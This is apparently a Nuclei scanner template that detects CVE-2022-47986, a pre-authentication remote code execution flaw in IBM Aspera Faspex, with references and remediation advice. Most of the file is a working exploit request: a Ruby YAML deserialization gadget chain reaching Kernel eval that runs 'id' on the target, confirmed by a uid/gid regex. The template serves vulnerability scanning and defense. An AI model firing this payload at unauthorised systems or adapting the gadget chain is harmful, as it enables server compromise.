id: CVE-2022-47986

info:
  name: Pre-Auth RCE in Aspera Faspex
  author: coldfish
  severity: critical
  description: |
    IBM Aspera Faspex could allow a remote attacker to execute arbitrary code on the system, caused by a YAML deserialization flaw. By sending a specially crafted obsolete API call, an attacker could exploit this vulnerability to execute arbitrary code on the system. The obsolete API call was removed in Faspex 4.4.2 PL2.
  reference:
    - https://blog.assetnote.io/2023/02/02/pre-auth-rce-aspera-faspex/
    - https://www.ibm.com/support/pages/node/6952319
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/243512
  remediation: This vulnerability can be remediated by either upgrading to Faspex 4.4.2 Patch Level 2 or Faspex 5.x which does not contain this vulnerability.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-47986
  metadata:
    shodan-query: html:"Aspera Faspex"
    verified: "true"
  tags: cve,cve2022,ibm,aspera,faspex,kev

requests:
  - raw:
      - |
        POST /aspera/faspex/package_relay/relay_package HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/json

        {"package_file_list": ["/"], "external_emails": "\n---\n- !ruby/object:Gem::Installer\n    i: x\n- !ruby/object:Gem::SpecFetcher\n    i: y\n- !ruby/object:Gem::Requirement\n  requirements:\n    !ruby/object:Gem::Package::TarReader\n    io: &1 !ruby/object:Net::BufferedIO\n      io: &1 !ruby/object:Gem::Package::TarReader::Entry\n         read: 0\n         header: \"pew\"\n      debug_output: &1 !ruby/object:Net::WriteAdapter\n         socket: &1 !ruby/object:PrettyPrint\n             output: !ruby/object:Net::WriteAdapter\n                 socket: &1 !ruby/module \"Kernel\"\n                 method_id: :eval\n             newline: \"throw `id`\"\n             buffer: {}\n             group_stack:\n              - !ruby/object:PrettyPrint::Group\n                break: true\n         method_id: :breakable\n", "package_name": "{{rand_base(4)}}", "package_note": "{{randstr}}", "original_sender_name": "{{randstr}}", "package_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec", "metadata_human_readable": "Yes", "forward": "pew", "metadata_json": "{}", "delivery_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec", "delivery_sender_name": "{{rand_base(8)}}", "delivery_title": "{{rand_base(4)}}", "delivery_note": "{{rand_base(4)}}", "delete_after_download": true, "delete_after_download_condition": "IDK"}

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 500